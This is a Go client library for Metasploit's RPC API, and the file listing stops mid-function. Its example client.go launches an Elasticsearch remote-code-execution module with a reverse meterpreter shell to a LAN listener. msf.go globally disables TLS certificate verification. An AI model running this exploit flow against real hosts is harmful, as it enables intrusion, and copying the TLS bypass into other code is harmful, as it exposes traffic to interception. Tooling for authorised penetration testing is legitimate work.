├── .gitignore ├── go.mod ├── README.md ├── rpc ├── msf.go ├── auth.go ├── job.go ├── plugin.go ├── console.go ├── core.go ├── module.go └── session.go ├── go.sum └── client.go /.gitignore: -------------------------------------------------------------------------------- 1 | test.go 2 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/fpr1m3/go-msf-rpc 2 | 3 | go 1.16 4 | 5 | require ( 6 | google.golang.org/appengine v1.6.7 // indirect 7 | gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c // indirect 8 | gopkg.in/vmihailenco/msgpack.v2 v2.9.2 9 | ) 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # go-msf-rpc 2 | Golang based RPC client to communicate with Metasploit. Based on code initially developed by Wyatt Dahlenburg [repo](https://github.com/wdahlenburg/msf-rpc-client). Extended to include other methods from the RPC API by @fpr1m3. 3 | 4 | ## Install 5 | `go get -u github.com/fpr1m3/go-msf-rpc/...` 6 | 7 | ### Reference 8 | https://wya.pl/2020/04/27/metasploits-rpc-api/ 9 | -------------------------------------------------------------------------------- /rpc/msf.go: -------------------------------------------------------------------------------- 1 | package rpc 2 | 3 | import ( 4 | "bytes" 5 | "crypto/tls" 6 | "fmt" 7 | "net/http" 8 | 9 | "gopkg.in/vmihailenco/msgpack.v2" 10 | ) 11 | 12 | type Metasploit struct { 13 | host string 14 | user string 15 | pass string 16 | token string 17 | } 18 | 19 | func New(host, user, pass string) (*Metasploit, error) { 20 | msf := &Metasploit{ 21 | host: host, 22 | user: user, 23 | pass: pass, 24 | } 25 | 26 | if err := msf.Login(); err != nil { 27 | return nil, err 28 | } 29 | 30 | return msf, nil 31 | } 32 | 33 | func (msf *Metasploit) send(req interface{}, res interface{}) error { 34 | buf := new(bytes.Buffer) 35 | msgpack.NewEncoder(buf).Encode(req) 36 | http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true} 37 | dest := fmt.Sprintf("%s/api", msf.host) 38 | response, err := http.Post(dest, "binary/message-pack", buf) 39 | // responseBytes, _ := httputil.DumpResponse(response, true) 40 | // log.Printf("Response dump: %s\n", string(responseBytes)) 41 | if err != nil { 42 | return err 43 | } 44 | defer response.Body.Close() 45 | 46 | if err := msgpack.NewDecoder(response.Body).Decode(&res); err != nil { 47 | return err 48 | } 49 | return nil 50 | } 51 | -------------------------------------------------------------------------------- /rpc/auth.go: -------------------------------------------------------------------------------- 1 | package rpc 2 | 3 | import "fmt" 4 | 5 | // Auth 6 | type loginReq struct { 7 | _msgpack struct{} `msgpack:",asArray"` 8 | Method string 9 | Username string 10 | Password string 11 | } 12 | 13 | type loginRes struct { 14 | Result string `msgpack:"result"` 15 | Token string `msgpack:"token"` 16 | Error bool `msgpack:"error"` 17 | ErrorClass string `msgpack:"error_class"` 18 | ErrorMessage string `msgpack:"error_message"` 19 | } 20 | 21 | type logoutReq struct { 22 | _msgpack struct{} `msgpack:",asArray"` 23 | Method string 24 | Token string 25 | LogoutToken string 26 | } 27 | 28 | type logoutRes struct { 29 | Result string `msgpack:"result"` 30 | } 31 | 32 | func (msf *Metasploit) Login() error { 33 | ctx := &loginReq{ 34 | Method: "auth.login", 35 | Username: msf.user, 36 | Password: msf.pass, 37 | } 38 | 39 | var res loginRes 40 | if err := msf.send(ctx, &res); err != nil { 41 | fmt.Println("Failed at login") 42 | return err 43 | } 44 | msf.token = res.Token 45 | return nil 46 | } 47 | 48 | func (msf *Metasploit) Logout() error { 49 | ctx := &logoutReq{ 50 | Method: "auth.logout", 51 | Token: msf.token, 52 | LogoutToken: msf.token, 53 | } 54 | 55 | var res logoutRes 56 | if err := msf.send(ctx, &res); err != nil { 57 | return err 58 | } 59 | msf.token = "" 60 | return nil 61 | } 62 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/golang/protobuf v1.3.1 h1:YF8+flBXS5eO826T4nzqPrxfhQThhXl0YzfuUPu4SBg= 2 | github.com/golang/protobuf v1.3.1/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= 3 | github.com/kr/pretty v0.2.1 h1:Fmg33tUaq4/8ym9TJN1x7sLJnHVwhP33CNkpYV/7rwI= 4 | github.com/kr/pretty v0.2.1/go.mod h1:ipq/a2n7PKx3OHsz4KJII5eveXtPO4qwEXGdVfWzfnI= 5 | github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= 6 | github.com/kr/text v0.1.0 h1:45sCR5RtlFHMR4UwH9sdQ5TC8v0qDQCHnXt+kaKSTVE= 7 | github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= 8 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 9 | golang.org/x/net v0.0.0-20190603091049-60506f45cf65 h1:+rhAzEzT3f4JtomfC371qB+0Ola2caSKcY69NUBZrRQ= 10 | golang.org/x/net v0.0.0-20190603091049-60506f45cf65/go.mod h1:HSz+uSET+XFnRR8LxR5pz3Of3rY3CfYBVs4xY44aLks= 11 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 12 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= 13 | golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= 14 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= 15 | google.golang.org/appengine v1.6.7 h1:FZR1q0exgwxzPzp/aF+VccGrSfxfPpkBqjIIEq3ru6c= 16 | google.golang.org/appengine v1.6.7/go.mod h1:8WjMMxjGQR8xUklV/ARdw2HLXBOI7O7uCIDZVag1xfc= 17 | gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= 18 | gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q= 19 | gopkg.in/vmihailenco/msgpack.v2 v2.9.2 h1:gjPqo9orRVlSAH/065qw3MsFCDpH7fa1KpiizXyllY4= 20 | gopkg.in/vmihailenco/msgpack.v2 v2.9.2/go.mod h1:/3Dn1Npt9+MYyLpYYXjInO/5jvMLamn+AEGwNEOatn8= 21 | -------------------------------------------------------------------------------- /rpc/job.go: -------------------------------------------------------------------------------- 1 | package rpc 2 | 3 | // Jobs 4 | 5 | type jobListReq struct { 6 | _msgpack struct{} `msgpack:",asArray"` 7 | Method string 8 | Token string 9 | } 10 | 11 | type jobListRes map[string]string 12 | 13 | type jobInfoReq struct { 14 | _msgpack struct{} `msgpack:",asArray"` 15 | Method string 16 | Token string 17 | JobId string 18 | } 19 | 20 | type jobInfoRes struct { 21 | Jid int `msgpack:"jid"` 22 | Name string `msgpack:"name"` 23 | StartTime int `msgpack:"start_time"` 24 | UriPath interface{} `msgpack:"uripath,omitempty"` 25 | Datastore map[string]interface{} `msgpack:"datastore,omitempty"` 26 | } 27 | 28 | type jobStopReq struct { 29 | _msgpack struct{} `msgpack:",asArray"` 30 | Method string 31 | Token string 32 | JobId string 33 | } 34 | 35 | type jobStopRes struct { 36 | Result string `msgpack:"result"` 37 | } 38 | 39 | // Jobs 40 | 41 | func (msf *Metasploit) JobList() (jobListRes, error) { 42 | ctx := &jobListReq{ 43 | Method: "job.list", 44 | Token: msf.token, 45 | } 46 | var res jobListRes 47 | if err := msf.send(ctx, &res); err != nil { 48 | return jobListRes{}, err 49 | } 50 | return res, nil 51 | } 52 | 53 | func (msf *Metasploit) JobInfo(jobId string) (jobInfoRes, error) { 54 | ctx := &jobInfoReq{ 55 | Method: "job.info", 56 | Token: msf.token, 57 | JobId: jobId, 58 | } 59 | var res jobInfoRes 60 | if err := msf.send(ctx, &res); err != nil { 61 | return jobInfoRes{}, err 62 | } 63 | return res, nil 64 | } 65 | 66 | func (msf *Metasploit) JobStop(jobId string) (jobStopRes, error) { 67 | ctx := &jobStopReq{ 68 | Method: "job.stop", 69 | Token: msf.token, 70 | JobId: jobId, 71 | } 72 | var res jobStopRes 73 | if err := msf.send(ctx, &res); err != nil { 74 | return jobStopRes{}, err 75 | } 76 | return res, nil 77 | } 78 | -------------------------------------------------------------------------------- /rpc/plugin.go: -------------------------------------------------------------------------------- 1 | package rpc 2 | 3 | // Plugins 4 | 5 | type pluginLoadReq struct { 6 | _msgpack struct{} `msgpack:",asArray"` 7 | Method string 8 | Token string 9 | PluginName string 10 | Options map[string]string 11 | } 12 | 13 | type pluginLoadRes struct { 14 | Result string `msgpack:"result"` 15 | } 16 | 17 | type pluginUnLoadReq struct { 18 | _msgpack struct{} `msgpack:",asArray"` 19 | Method string 20 | Token string 21 | PluginName string 22 | } 23 | 24 | type pluginUnLoadRes struct { 25 | Result string `msgpack:"result"` 26 | } 27 | 28 | type pluginLoadedReq struct { 29 | _msgpack struct{} `msgpack:",asArray"` 30 | Method string 31 | Token string 32 | } 33 | 34 | type pluginLoadedRes struct { 35 | Plugins []string `msgpack:"plugins"` 36 | } 37 | 38 | func (msf *Metasploit) PluginLoad(pluginName string, pluginOptions map[string]string) (pluginLoadRes, error) { 39 | ctx := &pluginLoadReq{ 40 | Method: "plugin.load", 41 | Token: msf.token, 42 | PluginName: pluginName, 43 | Options: pluginOptions, 44 | } 45 | var res pluginLoadRes 46 | if err := msf.send(ctx, &res); err != nil { 47 | return pluginLoadRes{}, err 48 | } 49 | return res, nil 50 | } 51 | 52 | func (msf *Metasploit) PluginUnLoad(pluginName string) (pluginUnLoadRes, error) { 53 | ctx := &pluginUnLoadReq{ 54 | Method: "plugin.unload", 55 | Token: msf.token, 56 | PluginName: pluginName, 57 | } 58 | var res pluginUnLoadRes 59 | if err := msf.send(ctx, &res); err != nil { 60 | return pluginUnLoadRes{}, err 61 | } 62 | return res, nil 63 | } 64 | 65 | func (msf *Metasploit) PluginLoaded() (pluginLoadedRes, error) { 66 | ctx := &pluginLoadedReq{ 67 | Method: "plugin.loaded", 68 | Token: msf.token, 69 | } 70 | var res pluginLoadedRes 71 | if err := msf.send(ctx, &res); err != nil { 72 | return pluginLoadedRes{}, err 73 | } 74 | return res, nil 75 | } 76 | -------------------------------------------------------------------------------- /client.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "log" 6 | "os" 7 | "time" 8 | 9 | "github.com/fpr1m3/go-msf-rpc/rpc" 10 | ) 11 | 12 | func checkErr(reason string, err error) bool { 13 | if err != nil { 14 | log.Println(fmt.Errorf("%s: %s", reason, err)) 15 | return true 16 | } 17 | return false 18 | } 19 | 20 | func checkFatalErr(reason string, err error) { 21 | if checkErr(reason, err) { 22 | os.Exit(0) 23 | } 24 | } 25 | 26 | func main() { 27 | host := os.Getenv("MSFHOST") 28 | user := os.Getenv("MSFUSER") 29 | pass := os.Getenv("MSFPASS") 30 | 31 | for _, val := range []string{host, user, pass} { 32 | if len(val) == 0 { 33 | log.Fatalln("Missing required environment variable MSFHOST, MSFUSER, or MSFPASS") 34 | } 35 | } 36 | 37 | msf, err := rpc.New(host, user, pass) 38 | if err != nil { 39 | log.Panicln(err) 40 | } 41 | defer msf.Logout() 42 | 43 | coreVersion, err := msf.CoreVersion() 44 | checkFatalErr("Unable to get core version.", err) 45 | log.Printf("Connected to Metasploit...\n\tVersion: %s\n\tRuby: %s\n\tAPI: %s", coreVersion.Version, coreVersion.Ruby, coreVersion.Api) 46 | msfEncodeRes, err := msf.ModuleEncode("AAAA", "x86/shikata_ga_nai", map[string]string{"format": "python"}) 47 | checkErr("Issue with MSF encode request", err) 48 | log.Printf("Data returned:\n%s\n", msfEncodeRes.Encoded) 49 | log.Printf("Target acquired... ElasticSearch...\n") 50 | moduleType := "exploit" 51 | moduleName := "multi/elasticsearch/script_mvel_rce" 52 | moduleOptions := map[string]string{ 53 | "RHOSTS": "192.168.1.131", 54 | "RPORT": "9200", 55 | "SSL": "false", 56 | "TARGETURI": "/", 57 | "WritableDir": "/tmp", 58 | "LHOST": "192.168.1.130", 59 | "LPORT": "4444", 60 | "PAYLOAD": "java/meterpreter/reverse_tcp", 61 | } 62 | execResp, err := msf.ModuleExecute(moduleType, moduleName, moduleOptions) 63 | checkFatalErr("Unable to execute module %s", err) 64 | log.Printf("Your new job ID is... %d\nCurrently waiting 5 seconds for module to complete.\n", execResp.JobId) 65 | time.Sleep(time.Second * 5) 66 | sessionList, err := msf.SessionList() 67 | checkErr("Unable to get session list", err) 68 | var sessionNumber uint32 69 | for i, val := range sessionList { 70 | log.Printf("Here is the information of Session %d\n", i) 71 | sessionNumber = i 72 | log.Printf("\tType:%s\n", val.Type) 73 | log.Printf("\tVia Exploit:%s\n", val.ViaExploit) 74 | log.Printf("Killing Session %d", i) 75 | result, err := msf.SessionMeterpreterSessionKill(sessionNumber) 76 | checkErr("Unable to get kill meterpreter session results", err) 77 | log.Printf("Result: %s", result.Result) 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /rpc/console.go: -------------------------------------------------------------------------------- 1 | package rpc 2 | 3 | // Console 4 | 5 | type consoleCreateReq struct { 6 | _msgpack struct{} `msgpack:",asArray"` 7 | Method string 8 | Token string 9 | } 10 | 11 | type consoleCreateRes struct { 12 | Id string `msgpack:"id"` 13 | Prompt string `msgpack:"prompt"` 14 | Busy bool `msgpack:"busy"` 15 | } 16 | 17 | type consoleDestroyReq struct { 18 | _msgpack struct{} `msgpack:",asArray"` 19 | Method string 20 | Token string 21 | ConsoleId string 22 | } 23 | 24 | type consoleDestroyRes struct { 25 | Result string `msgpack:"result"` 26 | } 27 | 28 | type consoleListReq struct { 29 | _msgpack struct{} `msgpack:",asArray"` 30 | Method string 31 | Token string 32 | } 33 | 34 | type consoleListRes map[string][]struct { 35 | Id string `msgpack:"id"` 36 | Prompt string `msgpack:"prompt"` 37 | Busy bool `msgpack:"busy"` 38 | } 39 | 40 | type consoleWriteReq struct { 41 | _msgpack struct{} `msgpack:",asArray"` 42 | Method string 43 | Token string 44 | ConsoleId string 45 | Command string 46 | } 47 | 48 | type consoleWriteRes struct { 49 | Wrote uint32 `msgpack:"wrote"` 50 | } 51 | 52 | type consoleReadReq struct { 53 | _msgpack struct{} `msgpack:",asArray"` 54 | Method string 55 | Token string 56 | ConsoleId string 57 | } 58 | 59 | type consoleReadRes struct { 60 | Data string `msgpack:"data"` 61 | Prompt string `msgpack:"prompt"` 62 | Busy bool `msgpack:"busy"` 63 | } 64 | 65 | type consoleSessionDetachReq struct { 66 | _msgpack struct{} `msgpack:",asArray"` 67 | Method string 68 | Token string 69 | ConsoleId string 70 | } 71 | 72 | type consoleSessionDetachRes struct { 73 | Result string `msgpack:"result"` 74 | } 75 | 76 | type consoleSessionKillReq struct { 77 | _msgpack struct{} `msgpack:",asArray"` 78 | Method string 79 | Token string 80 | ConsoleId string 81 | } 82 | 83 | type consoleSessionKillRes struct { 84 | Result string `msgpack:"result"` 85 | } 86 | 87 | type consoleTabsReq struct { 88 | _msgpack struct{} `msgpack:",asArray"` 89 | Method string 90 | Token string 91 | ConsoleId string 92 | InputLine string 93 | } 94 | 95 | type consoleTabsRes struct { 96 | Tabs []string `msgpack:"tabs"` 97 | } 98 | 99 | // Console 100 | 101 | func (msf *Metasploit) ConsoleCreate() (consoleCreateRes, error) { 102 | ctx := &consoleCreateReq{ 103 | Method: "console.create", 104 | Token: msf.token, 105 | } 106 | var res consoleCreateRes 107 | if err := msf.send(ctx, &res); err != nil { 108 | return consoleCreateRes{}, err 109 | } 110 | return res, nil 111 | } 112 | 113 | func (msf *Metasploit) ConsoleDestroy(consoleid string) (consoleDestroyRes, error) { 114 | ctx := &consoleDestroyReq{ 115 | Method: "console.destroy", 116 | Token: msf.token, 117 | ConsoleId: consoleid, 118 | } 119 | var res consoleDestroyRes 120 | if err := msf.send(ctx, &res); err != nil { 121 | return consoleDestroyRes{}, err 122 | } 123 | return res, nil 124 | } 125 | 126 | func (msf *Metasploit) ConsoleList() (consoleListRes, error) { 127 | ctx := &consoleListReq{ 128 | Method: "console.list", 129 | Token: msf.token, 130 | } 131 | var res consoleListRes 132 | if err := msf.send(ctx, &res); err != nil { 133 | return consoleListRes{}, err 134 | } 135 | return res, nil 136 | } 137 | 138 | func (msf *Metasploit) ConsoleWrite(consoleId, command string) (consoleWriteRes, error) { 139 | ctx := &consoleWriteReq{ 140 | Method: "console.write", 141 | Token: msf.token, 142 | ConsoleId: consoleId, 143 | Command: command, 144 | } 145 | var res consoleWriteRes 146 | if err := msf.send(ctx, &res); err != nil { 147 | return consoleWriteRes{}, err 148 | } 149 | return res, nil 150 | } 151 | 152 | func (msf *Metasploit) ConsoleRead(consoleId string) (consoleReadRes, error) { 153 | ctx := &consoleReadReq{ 154 | Method: "console.read", 155 | Token: msf.token, 156 | ConsoleId: consoleId, 157 | } 158 | var res consoleReadRes 159 | if err := msf.send(ctx, &res); err != nil { 160 | return consoleReadRes{}, err 161 | } 162 | return res, nil 163 | } 164 | 165 | func (msf *Metasploit) ConsoleSessionDetch(consoleId string) (consoleSessionDetachRes, error) { 166 | ctx := &consoleSessionDetachReq{ 167 | Method: "console.session_detach", 168 | Token: msf.token, 169 | ConsoleId: consoleId, 170 | } 171 | var res consoleSessionDetachRes 172 | if err := msf.send(ctx, &res); err != nil { 173 | return consoleSessionDetachRes{}, err 174 | } 175 | return res, nil 176 | } 177 | 178 | func (msf *Metasploit) ConsoleSessionKill(consoleId string) (consoleSessionKillRes, error) { 179 | ctx := &consoleSessionKillReq{ 180 | Method: "console.session_kill", 181 | Token: msf.token, 182 | ConsoleId: consoleId, 183 | } 184 | var res consoleSessionKillRes 185 | if err := msf.send(ctx, &res); err != nil { 186 | return consoleSessionKillRes{}, err 187 | } 188 | return res, nil 189 | } 190 | 191 | func (msf *Metasploit) ConsoleTabs(consoleId, inputLine string) (consoleTabsRes, error) { 192 | ctx := &consoleTabsReq{ 193 | Method: "console.tabs", 194 | Token: msf.token, 195 | ConsoleId: consoleId, 196 | InputLine: inputLine, 197 | } 198 | var res consoleTabsRes 199 | if err := msf.send(ctx, &res); err != nil { 200 | return consoleTabsRes{}, err 201 | } 202 | return res, nil 203 | } 204 | -------------------------------------------------------------------------------- /rpc/core.go: -------------------------------------------------------------------------------- 1 | package rpc 2 | 3 | // Core 4 | type coreAddModulePathReq struct { 5 | _msgpack struct{} `msgpack:",asArray"` 6 | Method string 7 | Token string 8 | Path string 9 | } 10 | 11 | type coreAddModulePathRes struct { 12 | Exploits uint32 `msgpack:"exploits"` 13 | Auxiliary uint32 `msgpack:"auxiliary"` 14 | Post uint32 `msgpack:"post"` 15 | Encoders uint32 `msgpack:"encoders"` 16 | Nops uint32 `msgpack:"nops"` 17 | Payloads uint32 `msgpack:"payloads"` 18 | } 19 | 20 | type coreModuleStatsReq struct { 21 | _msgpack struct{} `msgpack:",asArray"` 22 | Method string 23 | Token string 24 | } 25 | 26 | type coreModuleStatsRes struct { 27 | Exploits uint32 `msgpack:"exploits"` 28 | Auxiliary uint32 `msgpack:"auxiliary"` 29 | Post uint32 `msgpack:"post"` 30 | Encoders uint32 `msgpack:"encoders"` 31 | Nops uint32 `msgpack:"nops"` 32 | Payloads uint32 `msgpack:"payloads"` 33 | } 34 | 35 | type coreReloadModulesReq struct { 36 | _msgpack struct{} `msgpack:",asArray"` 37 | Method string 38 | Token string 39 | } 40 | 41 | type coreReloadModulesRes struct { 42 | Exploits uint32 `msgpack:"exploits"` 43 | Auxiliary uint32 `msgpack:"auxiliary"` 44 | Post uint32 `msgpack:"post"` 45 | Encoders uint32 `msgpack:"encoders"` 46 | Nops uint32 `msgpack:"nops"` 47 | Payloads uint32 `msgpack:"payloads"` 48 | } 49 | 50 | type coreSaveReq struct { 51 | _msgpack struct{} `msgpack:",asArray"` 52 | Method string 53 | Token string 54 | } 55 | 56 | type coreSaveRes struct { 57 | Result string `msgpack:"result"` 58 | } 59 | 60 | type coreSetgReq struct { 61 | _msgpack struct{} `msgpack:",asArray"` 62 | Method string 63 | Token string 64 | OptionName string 65 | OptionValue string 66 | } 67 | 68 | type coreSetgRes struct { 69 | Result string `msgpack:"result"` 70 | } 71 | 72 | type coreUnSetgReq struct { 73 | _msgpack struct{} `msgpack:",asArray"` 74 | Method string 75 | Token string 76 | OptionName string 77 | } 78 | 79 | type coreUnSetgRes struct { 80 | Result string `msgpack:"result"` 81 | } 82 | 83 | type coreThreadListReq struct { 84 | _msgpack struct{} `msgpack:",asArray"` 85 | Method string 86 | Token string 87 | } 88 | 89 | type coreThreadListRes map[int]struct { 90 | Status string `msgpack:"status"` 91 | Critical bool `msgpack:"critical"` 92 | Name string `msgpack:"name"` 93 | Started string `msgpack:"started"` 94 | } 95 | 96 | type coreThreadKillReq struct { 97 | _msgpack struct{} `msgpack:",asArray"` 98 | Method string 99 | Token string 100 | ThreadId string 101 | } 102 | 103 | type coreThreadKillRes struct { 104 | Result string `msgpack:"result"` 105 | } 106 | 107 | type coreVersionReq struct { 108 | _msgpack struct{} `msgpack:",asArray"` 109 | Method string 110 | Token string 111 | } 112 | 113 | type coreVersionRes struct { 114 | Version string `msgpack:"version"` 115 | Ruby string `msgpack:"ruby"` 116 | Api string `msgpack:"api"` 117 | } 118 | 119 | type coreStopReq struct { 120 | _msgpack struct{} `msgpack:",asArray"` 121 | Method string 122 | Token string 123 | } 124 | 125 | type coreStopRes struct { 126 | Result string `msgpack:"result"` 127 | } 128 | 129 | func (msf *Metasploit) CoreAddModulePath(path string) (coreAddModulePathRes, error) { 130 | ctx := &coreAddModulePathReq{ 131 | Method: "core.add_module_path", 132 | Token: msf.token, 133 | Path: path, 134 | } 135 | 136 | var res coreAddModulePathRes 137 | if err := msf.send(ctx, &res); err != nil { 138 | return coreAddModulePathRes{}, err 139 | } 140 | return res, nil 141 | } 142 | 143 | func (msf *Metasploit) CoreModuleStats() (coreModuleStatsRes, error) { 144 | ctx := &coreModuleStatsReq{ 145 | Method: "core.module_stats", 146 | Token: msf.token, 147 | } 148 | 149 | var res coreModuleStatsRes 150 | if err := msf.send(ctx, &res); err != nil { 151 | return coreModuleStatsRes{}, err 152 | } 153 | return res, nil 154 | } 155 | 156 | func (msf *Metasploit) CoreReloadModules() (coreReloadModulesRes, error) { 157 | ctx := &coreReloadModulesReq{ 158 | Method: "core.reload_modules", 159 | Token: msf.token, 160 | } 161 | 162 | var res coreReloadModulesRes 163 | if err := msf.send(ctx, &res); err != nil { 164 | return coreReloadModulesRes{}, err 165 | } 166 | return res, nil 167 | } 168 | 169 | func (msf *Metasploit) CoreSave() (coreSaveRes, error) { 170 | ctx := &coreSaveReq{ 171 | Method: "core.save", 172 | Token: msf.token, 173 | } 174 | 175 | var res coreSaveRes 176 | if err := msf.send(ctx, &res); err != nil { 177 | return coreSaveRes{}, nil 178 | } 179 | return res, nil 180 | } 181 | 182 | func (msf *Metasploit) CoreSetg(optionName, optionValue string) (coreSetgRes, error) { 183 | ctx := &coreSetgReq{ 184 | Method: "core.setg", 185 | Token: msf.token, 186 | OptionName: optionName, 187 | OptionValue: optionValue, 188 | } 189 | 190 | var res coreSetgRes 191 | if err := msf.send(ctx, &res); err != nil { 192 | return coreSetgRes{}, nil 193 | } 194 | return res, nil 195 | } 196 | 197 | func (msf *Metasploit) CoreUnSetg(optionName string) (coreUnSetgRes, error) { 198 | ctx := &coreUnSetgReq{ 199 | Method: "core.unsetg", 200 | Token: msf.token, 201 | OptionName: optionName, 202 | } 203 | 204 | var res coreUnSetgRes 205 | if err := msf.send(ctx, &res); err != nil { 206 | return coreUnSetgRes{}, nil 207 | } 208 | return res, nil 209 | } 210 | 211 | func (msf *Metasploit) CoreThreadList() (coreThreadListRes, error) { 212 | ctx := &coreThreadListReq{ 213 | Method: "core.thread_list", 214 | Token: msf.token, 215 | } 216 | 217 | var res coreThreadListRes 218 | if err := msf.send(ctx, &res); err != nil { 219 | return coreThreadListRes{}, nil 220 | } 221 | return res, nil 222 | } 223 | 224 | func (msf *Metasploit) CoreThreadKill(threadId string) (coreThreadKillRes, error) { 225 | ctx := &coreThreadKillReq{ 226 | Method: "core.thread_kill", 227 | Token: msf.token, 228 | ThreadId: threadId, 229 | } 230 | 231 | var res coreThreadKillRes 232 | if err := msf.send(ctx, &res); err != nil { 233 | return coreThreadKillRes{}, nil 234 | } 235 | return res, nil 236 | } 237 | 238 | func (msf *Metasploit) CoreVersion() (coreVersionRes, error) { 239 | ctx := &coreVersionReq{ 240 | Method: "core.version", 241 | Token: msf.token, 242 | } 243 | var res coreVersionRes 244 | if err := msf.send(ctx, &res); err != nil { 245 | return coreVersionRes{}, err 246 | } 247 | return res, nil 248 | } 249 | 250 | func (msf *Metasploit) CoreStop() (coreStopRes, error) { 251 | ctx := &coreStopReq{ 252 | Method: "core.stop", 253 | Token: msf.token, 254 | } 255 | var res coreStopRes 256 | if err := msf.send(ctx, &res); err != nil { 257 | return coreStopRes{}, err 258 | } 259 | return res, nil 260 | } 261 | -------------------------------------------------------------------------------- /rpc/module.go: -------------------------------------------------------------------------------- 1 | package rpc 2 | 3 | // Modules 4 | 5 | type moduleExploitsReq struct { 6 | _msgpack struct{} `msgpack:",asArray"` 7 | Method string 8 | Token string 9 | } 10 | 11 | type moduleExploitsRes struct { 12 | Modules []string `msgpack:"modules"` 13 | } 14 | 15 | type moduleAuxiliaryReq struct { 16 | _msgpack struct{} `msgpack:",asArray"` 17 | Method string 18 | Token string 19 | } 20 | 21 | type moduleAuxiliaryRes struct { 22 | Modules []string `msgpack:"modules"` 23 | } 24 | 25 | type modulePostReq struct { 26 | _msgpack struct{} `msgpack:",asArray"` 27 | Method string 28 | Token string 29 | } 30 | 31 | type modulePostRes struct { 32 | Modules []string `msgpack:"modules"` 33 | } 34 | 35 | type modulePayloadsReq struct { 36 | _msgpack struct{} `msgpack:",asArray"` 37 | Method string 38 | Token string 39 | } 40 | 41 | type modulePayloadsRes struct { 42 | Modules []string `msgpack:"modules"` 43 | } 44 | 45 | type moduleEncodersReq struct { 46 | _msgpack struct{} `msgpack:",asArray"` 47 | Method string 48 | Token string 49 | } 50 | 51 | type moduleEncodersRes struct { 52 | Modules []string `msgpack:"modules"` 53 | } 54 | 55 | type moduleNopsReq struct { 56 | _msgpack struct{} `msgpack:",asArray"` 57 | Method string 58 | Token string 59 | } 60 | 61 | type moduleNopsRes struct { 62 | Modules []string `msgpack:"modules"` 63 | } 64 | 65 | type moduleInfoReq struct { 66 | _msgpack struct{} `msgpack:",asArray"` 67 | Method string 68 | Token string 69 | ModuleType string 70 | ModuleName string 71 | } 72 | 73 | type moduleInfoRes struct { 74 | Name string `msgpack:"name"` 75 | Description string `msgpack:"description"` 76 | License string `msgpack:"license"` 77 | FilePath string `msgpack:"filepath"` 78 | Version string `msgpack:"version"` 79 | Rank string `msgpack:"rank"` 80 | References [][]string `msgpack:"references"` 81 | Authors []string `msgpack:"authors"` 82 | } 83 | 84 | type moduleOptionsReq struct { 85 | _msgpack struct{} `msgpack:",asArray"` 86 | Method string 87 | Token string 88 | ModuleType string 89 | ModuleName string 90 | } 91 | 92 | type moduleOptionsRes map[string]struct { 93 | Type string `msgpack:"type"` 94 | Required bool `msgpack:"required"` 95 | Advanced bool `msgpack:"advanced"` 96 | Evasion bool `msgpack:"evasion"` 97 | Desc string `msgpack:"desc"` 98 | Default interface{} `msgpack:"default"` 99 | Enums []string `msgpack:"enums,omitempty"` 100 | } 101 | 102 | type moduleCompatiblePayloadsReq struct { 103 | _msgpack struct{} `msgpack:",asArray"` 104 | Method string 105 | Token string 106 | ModuleName string 107 | } 108 | 109 | type moduleCompatiblePayloadsRes struct { 110 | Payloads []string `msgpack:"payloads"` 111 | } 112 | 113 | type moduleTargetCompatiblePayloadsReq struct { 114 | _msgpack struct{} `msgpack:",asArray"` 115 | Method string 116 | Token string 117 | ModuleName string 118 | ArchNumber uint32 119 | } 120 | 121 | type moduleTargetCompatiblePayloadsRes struct { 122 | Payloads []string `msgpack:"payloads"` 123 | } 124 | 125 | type moduleCompatibleSessionsReq struct { 126 | _msgpack struct{} `msgpack:",asArray"` 127 | Method string 128 | Token string 129 | ModuleName string 130 | } 131 | 132 | type moduleCompatibleSessionsRes struct { 133 | Sessions []string `msgpack:"sessions"` 134 | } 135 | 136 | type moduleEncodeReq struct { 137 | _msgpack struct{} `msgpack:",asArray"` 138 | Method string 139 | Token string 140 | Data string 141 | EncoderModule string 142 | Options map[string]string 143 | } 144 | 145 | type moduleEncodeRes struct { 146 | Encoded []byte `msgpack:"encoded"` 147 | } 148 | 149 | type moduleExecuteReq struct { 150 | _msgpack struct{} `msgpack:",asArray"` 151 | Method string 152 | Token string 153 | ModuleType string 154 | ModuleName string 155 | Options map[string]string 156 | } 157 | 158 | type moduleExecuteRes struct { 159 | JobId uint32 `msgpack:"job_id"` 160 | } 161 | 162 | func (msf *Metasploit) ModuleExploits() (moduleExploitsRes, error) { 163 | ctx := &moduleExploitsReq{ 164 | Method: "module.exploits", 165 | Token: msf.token, 166 | } 167 | var res moduleExploitsRes 168 | if err := msf.send(ctx, &res); err != nil { 169 | return moduleExploitsRes{}, err 170 | } 171 | return res, nil 172 | } 173 | 174 | func (msf *Metasploit) 